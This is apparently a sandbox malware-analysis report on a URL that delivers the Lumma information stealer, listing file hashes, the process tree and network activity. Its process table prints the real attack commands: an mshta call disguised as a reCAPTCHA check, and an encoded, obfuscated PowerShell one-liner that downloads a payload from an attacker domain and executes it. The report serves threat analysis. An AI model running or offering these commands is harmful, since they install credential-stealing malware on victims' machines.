| URL: | https://xn--document-publisher-dn-serveri4112-dy0a.3744554.com/api/reg/documents/instruction_695-18014-012_rev.php |
| Full analysis: | https://app.any.run/tasks/5b8b4ffb-79a2-46b4-a504-e888848ffa14 |
| Verdict: | Malicious activity |
| Threats: | Lumma is an information stealer, developed using the C programming language. It is offered for sale as a malware-as-a-service, with several plans available. It usually targets cryptocurrency wallets, login credentials, and other sensitive information on a compromised system. The malicious software regularly gets updates that improve and expand its functionality, making it a serious stealer threat. |
| Analysis date: | January 11, 2025, 00:32:00 |
| OS: | Windows 10 Professional (build: 19045, 64 bit) |
| Tags: | |
| Indicators: | |
| MD5: | 57D3FBB9F9D508E74ACF5A5BA4B2D927 |
| SHA1: | 66E73FA6B5C91F599D479809FF5CD80210EFF7E5 |
| SHA256: | 02ABA88A4BF19545A4A2C6BC73D07744580854078D844FE51D50DF59133289E6 |
| SSDEEP: | 3:N8nLKGduRVCKy8FRBk82id3IaB7uReRhKa9AHVNV:25IGIFRu8dd3dBiEOEA1 |
PID | CMD | Path | Indicators | Parent process |
|---|---|---|---|---|
| 1488 | "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --mojo-platform-channel-handle=1516 --field-trial-handle=1448,i,9215433720951941825,10532544304349230722,262144 --variations-seed-version /prefetch:8 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | — | msedge.exe |
User: admin Company: Microsoft Corporation Integrity Level: LOW Description: Microsoft Edge Exit code: 0 Version: 122.0.2365.59 | ||||
| 1596 | "C:\WINDOWS\system32\mshta.exe" https://r2.exploredairyaptitude.shop/doc_khmdp.mp4 # ✅ ''I am not a robot - reCAPTCHA Verification ID: 3704'' | C:\Windows\System32\mshta.exe | explorer.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft (R) HTML Application host Exit code: 0 Version: 11.00.19041.1 (WinBuild.160101.0800) | ||||
| 2672 | "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | explorer.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) | ||||
| 2928 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -Enc UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFMAeQBzAFcAbwB3ADYANABcAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABcAHYAMQAuADAAXABwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIgAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAJwAtAHcAJwAsACcAaABpAGQAZABlAG4AJwAsACcALQBlAHAAJwAsACcAYgB5AHAAYQBzAHMAJwAsACcALQBuAG8AcAAnACwAJwAtAEMAbwBtAG0AYQBuAGQAJwAsACcAUwBWACAAZQBLACAAJwAnAGgAdAB0AHAAcwA6AC8ALwByADEALgBlAHgAcABsAG8AcgBlAGQAYQBpAHIAeQBhAHAAdABpAHQAdQBkAGUALgBzAGgAbwBwAC8AYgBiAGEAcgAuAHAAbgB4ACcAJwA7AFMAZQB0AC0ASQB0AGUAbQAgAFYAYQByAGkAYQBiAGwAZQA6AFwAQQBCACAAKABbAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAXQA6ADoATgBlAHcAKAApACkAOwBTAEkAIABWAGEAcgBpAGEAYgBsAGUAOgAvAG4ARQAgACgAKAAoACgAKABJAHQAZQBtACAAVgBhAHIAaQBhAGIAbABlADoAXABBAEIAKQAuAFYAYQBsAHUAZQB8AEcAZQB0AC0ATQBlAG0AYgBlAHIAKQB8AFcAaABlAHIAZQB7ACgARwBlAHQALQBWAGEAcgBpAGEAYgBsAGUAIABfACAALQBWAGEAbAB1ACkALgBOAGEAbQBlACAALQBpAGwAaQBrAGUAJwAnAEQAKgBhACcAJwB9ACkALgBOAGEAbQBlACkAKQA7ACgAWwBTAHkAcwB0AGUAbQAuAFMAdAByAGkAbgBnAF0AOgA6AEoAbwBpAG4AKAAnACcAJwAnACwAKAAoACgASQB0AGUAbQAgAFYAYQByAGkAYQBiAGwAZQA6AFwAQQBCACkALgBWAGEAbAB1AGUALgAoACgAQwBoAGkAbABkAEkAdABlAG0AIABWAGEAcgBpAGEAYgBsAGUAOgAvAG4ARQApAC4AVgBhAGwAdQBlACkAKAAoAEcAVgAgAGUASwApAC4AVgBhAGwAdQBlACkAfABGAG8AcgBFAGEAYwBoAC0ATwBiAGoAZQBjAHQAewAoAEcAVgAgAF8AKQAuAFYAYQBsAHUAZQAtAEEAcwAnACcAQwBoAGEAcgAnACcAfQApACkAKQApAHwAJgAkAEUAeABlAGMAdQB0AGkAbwBuAEMAbwBuAHQAZQB4AHQALgAoACgAJABFAHgAZQBjAHUAdABpAG8AbgBDAG8AbgB0AGUAeAB0AHwARwBlAHQALQBNAGUAbQBiAGUAcgApAFsANgBdAC4ATgBhAG0AZQApAC4AKAAoACQARQB4AGUAYwB1AHQAaQBvAG4AQwBvAG4AdABlAHgAdAAuACgAKAAkAEUAeABlAGMAdQB0AGkAbwBuAEMAbwBuAHQAZQB4AHQAfABHAGUAdAAtAE0AZQBtAGIAZQByACkAWwA2AF0ALgBOAGEAbQBlACkAfABHAGUAdAAtAE0AZQBtAGIAZQByACkAWwAyAF0ALgBOAGEAbQBlACkAKAAkAEUAeABlAGMAdQB0AGkAbwBuAEMAbwBuAHQAZQB4AHQALgAoACgAJABFAHgAZQBjAHUAdABpAG8AbgBDAG8AbgB0AGUAeAB0AHwARwBlAHQALQBNAGUAbQBiAGUAcgApAFsANgBdAC4ATgBhAG0AZQApAC4AKAAoACQARQB4AGUAYwB1AHQAaQBvAG4AQwBvAG4AdABlAHgAdAAuACgAKAAkAEUAeABlAGMAdQB0AGkAbwBuAEMAbwBuAHQAZQB4AHQAfABHAGUAdAAtAE0AZQBtAGIAZQByACkAWwA2AF0ALgBOAGEAbQBlACkALgBQAHMATwBiAGoAZQBjAHQALgBNAGUAdABoAG8AZABzAHwAVwBoAGUAcgBlAHsAKABHAGUAdAAtAFYAYQByAGkAYQBiAGwAZQAgAF8AIAAtAFYAYQBsAHUAKQAuAE4AYQBtAGUAIAAtAGkAbABpAGsAZQAnACcARwAqAG8AbQAqAGUAJwAnAH0AKQAuAE4AYQBtAGUAKQAoACcAJwBJAG4AKgAtAEUAeAAqAGkAbwBuACcAJwAsADEALAAxACkAKQAnAA== | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | mshta.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) | ||||
| 3080 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows\System32\conhost.exe | — | powershell.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Console Window Host Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) | ||||
| 3988 | "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-US --service-sandbox-type=search_indexer --message-loop-type-ui --no-appcompat-clear --mojo-platform-channel-handle=1672 --field-trial-handle=1448,i,9215433720951941825,10532544304349230722,262144 --variations-seed-version /prefetch:8 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | — | msedge.exe |
User: admin Company: Microsoft Corporation Integrity Level: LOW Description: Microsoft Edge Version: 122.0.2365.59 | ||||
| 5252 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows\System32\conhost.exe | — | powershell.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Console Window Host Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) | ||||
| 5740 | "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command SV eK 'https://r1.exploredairyaptitude.shop/bbar.pnx';Set-Item Variable:\AB ([Net.WebClient]::New());SI Variable:/nE (((((Item Variable:\AB).Value|Get-Member)|Where{(Get-Variable _ -Valu).Name -ilike'D*a'}).Name));([System.String]::Join('',(((Item Variable:\AB).Value.((ChildItem Variable:/nE).Value)((GV eK).Value)|ForEach-Object{(GV _).Value-As'Char'}))))|&$ExecutionContext.(($ExecutionContext|Get-Member)[6].Name).(($ExecutionContext.(($ExecutionContext|Get-Member)[6].Name)|Get-Member)[2].Name)($ExecutionContext.(($ExecutionContext|Get-Member)[6].Name).(($ExecutionContext.(($ExecutionContext|Get-Member)[6].Name).PsObject.Methods|Where{(Get-Variable _ -Valu).Name -ilike'G*om*e'}).Name)('In*-Ex*ion',1,1)) | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | powershell.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 4294967295 Version: 10.0.19041.1 (WinBuild.160101.0800) | ||||
| 6240 | "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" "https://xn--document-publisher-dn-serveri4112-dy0a.3744554.com/api/reg/documents/instruction_695-18014-012_rev.php" | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | explorer.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Edge Version: 122.0.2365.59 | ||||
| 6436 | "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=122.0.6261.70 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=122.0.2365.59 --initial-client-data=0x300,0x304,0x308,0x274,0x310,0x7ff818435fd8,0x7ff818435fe4,0x7ff818435ff0 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | — | msedge.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Edge Version: 122.0.2365.59 | ||||
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 6240 | msedge.exe | C:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Default\parcel_tracking_db\LOG.old~RF135a1a.TMP | — | |
MD5:— | SHA256:— | |||
| 6240 | msedge.exe | C:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Default\parcel_tracking_db\LOG.old | — | |
MD5:— | SHA256:— | |||
| 6240 | msedge.exe | C:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Default\discounts_db\LOG.old~RF135a1a.TMP | — | |
MD5:— | SHA256:— | |||
| 6240 | msedge.exe | C:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Default\PersistentOriginTrials\LOG.old~RF135a1a.TMP | — | |
MD5:— | SHA256:— | |||
| 6240 | msedge.exe | C:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Default\discounts_db\LOG.old | — | |
MD5:— | SHA256:— | |||
| 6240 | msedge.exe | C:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Default\PersistentOriginTrials\LOG.old | — | |
MD5:— | SHA256:— | |||
| 6240 | msedge.exe | C:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Default\EdgePushStorageWithConnectTokenAndKey\LOG.old~RF135a39.TMP | — | |
MD5:— | SHA256:— | |||
| 6240 | msedge.exe | C:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Default\EdgePushStorageWithConnectTokenAndKey\LOG.old | — | |
MD5:— | SHA256:— | |||
| 6240 | msedge.exe | C:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Default\commerce_subscription_db\LOG.old~RF135a1a.TMP | — | |
MD5:— | SHA256:— | |||
| 6240 | msedge.exe | C:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Default\commerce_subscription_db\LOG.old | — | |
MD5:— | SHA256:— | |||
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
— | — | GET | 200 | 23.48.23.143:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | unknown | — | — | whitelisted |
— | — | GET | 200 | 192.229.221.95:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTrjrydRyt%2BApF3GSPypfHBxR5XtQQUs9tIpPmhxdiuNkHMEWNpYim8S8YCEAI5PUjXAkJafLQcAAsO18o%3D | unknown | — | — | whitelisted |
— | — | GET | 200 | 184.30.21.171:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | unknown | — | — | whitelisted |
— | — | GET | 200 | 192.229.221.95:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D | unknown | — | — | whitelisted |
1596 | mshta.exe | GET | 200 | 142.250.186.35:80 | http://c.pki.goog/r/gsr1.crl | unknown | — | — | whitelisted |
1596 | mshta.exe | GET | 200 | 142.250.186.35:80 | http://c.pki.goog/r/r4.crl | unknown | — | — | whitelisted |
3952 | backgroundTaskHost.exe | GET | 200 | 192.229.221.95:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEAUZZSZEml49Gjh0j13P68w%3D | unknown | — | — | whitelisted |
7312 | SIHClient.exe | GET | 200 | 95.101.149.131:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl | unknown | — | — | whitelisted |
7312 | SIHClient.exe | GET | 200 | 95.101.149.131:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl | unknown | — | — | whitelisted |
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
4 | System | 192.168.100.255:138 | — | — | — | whitelisted |
4712 | MoUsoCoreWorker.exe | 4.231.128.59:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted |
4 | System | 192.168.100.255:137 | — | — | — | whitelisted |
5496 | svchost.exe | 4.231.128.59:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted |
5064 | SearchApp.exe | 104.126.37.131:443 | www.bing.com | Akamai International B.V. | DE | whitelisted |
— | — | 4.231.128.59:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted |
— | — | 192.229.221.95:80 | ocsp.digicert.com | EDGECAST | US | whitelisted |
— | — | 23.48.23.143:80 | crl.microsoft.com | Akamai International B.V. | DE | whitelisted |
— | — | 184.30.21.171:80 | www.microsoft.com | AKAMAI-AS | DE | whitelisted |
1176 | svchost.exe | 40.126.32.136:443 | login.live.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted |
Domain | IP | Reputation |
|---|---|---|
settings-win.data.microsoft.com |
| whitelisted |
www.bing.com |
| whitelisted |
ocsp.digicert.com |
| whitelisted |
crl.microsoft.com |
| whitelisted |
www.microsoft.com |
| whitelisted |
google.com |
| whitelisted |
login.live.com |
| whitelisted |
config.edge.skype.com |
| whitelisted |
xn--document-publisher-dn-serveri4112-dy0a.3744554.com |
| unknown |
edge.microsoft.com |
| whitelisted |